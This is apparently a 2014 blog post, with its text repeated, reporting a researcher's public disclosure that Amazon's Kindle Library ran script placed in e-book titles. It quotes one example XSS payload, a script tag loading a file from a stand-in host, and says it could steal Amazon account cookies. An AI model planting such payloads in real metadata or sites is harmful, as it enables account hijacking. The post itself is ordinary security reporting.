This isn’t good.
Security consultant Benjamin Daniel Mussler at B.FL7.DE claims that Amazon’s Kindle Library is currently vulnerable to XSS (cross site scripting) attacks, in which malicious code is inserted into the metadata for an eBook and then grabs your credentials for Amazon:
Once an attacker manages to have an e-book (file, document, …) with a title like
<script src=”https://www.example.org/script.js”></script>
added to the victim’s library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.
And who is vulnerable to this? Mussler’s answer is this:
Basically, everyone who uses Amazon’s Kindle Library to store e-books or to deliver them to a Kindle.
However, users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.
Users who stick to e-books sold and delivered by Amazon should be safe, unless there’s another oversight on Amazon’s part, such as the one described here: <http://drwetter.eu/amazon/>
Lovely. What’s worse is that Mussler reported this to Amazon last year and it was fixed. But according to him it’s returned and Amazon has not fixed it or responded to him when he reported it to Amazon in early in July. Thus he’s gone public.
One thing to consider is that popular e-book reader Calibre had the same issue and it was fixed within four hours of it being reported by Mussler. So one has to wonder why Amazon is taking so long.
Related
This entry was posted on September 16, 2014 at 10:06 pm and is filed under Commentary with tags Amazon, Security. You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
Amazon Won’t Fix A Kindle Exploit That Steals Amazon Credentials
This isn’t good.
Security consultant Benjamin Daniel Mussler at B.FL7.DE claims that Amazon’s Kindle Library is currently vulnerable to XSS (cross site scripting) attacks, in which malicious code is inserted into the metadata for an eBook and then grabs your credentials for Amazon:
Once an attacker manages to have an e-book (file, document, …) with a title like
added to the victim’s library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.
And who is vulnerable to this? Mussler’s answer is this:
Basically, everyone who uses Amazon’s Kindle Library to store e-books or to deliver them to a Kindle.
However, users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.
Users who stick to e-books sold and delivered by Amazon should be safe, unless there’s another oversight on Amazon’s part, such as the one described here: <http://drwetter.eu/amazon/>
Lovely. What’s worse is that Mussler reported this to Amazon last year and it was fixed. But according to him it’s returned and Amazon has not fixed it or responded to him when he reported it to Amazon in early in July. Thus he’s gone public.
One thing to consider is that popular e-book reader Calibre had the same issue and it was fixed within four hours of it being reported by Mussler. So one has to wonder why Amazon is taking so long.
Share this:
Like this:
Related
This entry was posted on September 16, 2014 at 10:06 pm and is filed under Commentary with tags Amazon, Security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.